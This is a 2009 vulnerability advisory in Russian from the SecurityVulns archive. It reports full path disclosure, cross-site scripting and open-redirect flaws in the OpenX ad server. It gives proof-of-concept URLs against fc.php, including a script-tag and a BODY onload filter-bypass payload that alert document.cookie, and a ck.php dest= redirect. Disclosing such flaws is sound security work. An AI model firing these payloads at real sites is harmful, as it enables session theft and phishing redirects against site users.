Vulnerabilities in OpenX

2009-05-04T00:00:00
ID SECURITYVULNS:DOC:21771
Type securityvulns
Reporter Securityvulns
Modified 2009-05-04T00:00:00

Description

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Full path disclosure, Cross-Site Scripting и Redirector уязвимостях в OpenX.

Full path disclosure:

http://site/openx/www/delivery/fc.php?MAX_type=1

XSS:

http://site/openx/www/delivery/fc.php?MAX_type=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (обход XSS фильтров в версии 2.6.3):

http://site/openx/www/delivery/fc.php?MAX_type=%3CBODY%20onload=alert(document.cookie)%3E

Redirector:

http://site/openx/www/delivery/ck.php?dest=http://site.com

Уязвимы OpenX v2.4.9, OpenX v2.6.3 и предыдущие версии (и все версии Openads). А к Redirector уязвимы все версии системы - OpenX v2.8.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте: http://websecurity.com.ua/3107/

Best wishes & regards, MustLive Администратор сайта http://websecurity.com.ua